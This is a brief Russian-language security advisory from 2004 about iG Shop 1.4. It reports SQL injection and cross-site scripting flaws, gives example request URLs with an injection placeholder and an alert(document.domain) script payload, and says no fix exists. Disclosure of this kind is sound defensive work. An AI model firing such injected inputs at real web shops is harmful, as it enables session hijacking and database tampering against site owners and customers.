Несколько уязвимостей в iG Shop
| Дата публикации: | 02.03.2004 |
| Всего просмотров: | 1496 |
| Опасность: | Средняя |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: iG Shop 1.4
Описание: Уязвимость обнаружена в iG Shop. Удаленный атакующий может выполнить XSS нападение и нападение SQL инъекции. 1. SQL инъекция:
page.php?page_type=catalog_products&type_id[]='[SQL Injection]&SESSION_ID={SESSION_ID}&SESSION_ID=
2. XSS нападение:
page.php?page_type=catalog_products&typ e_id[]=%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
URL производителя: http://www.igeneric.co.uk/PHP/iG_Scripts/11.html Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | Vulnerability |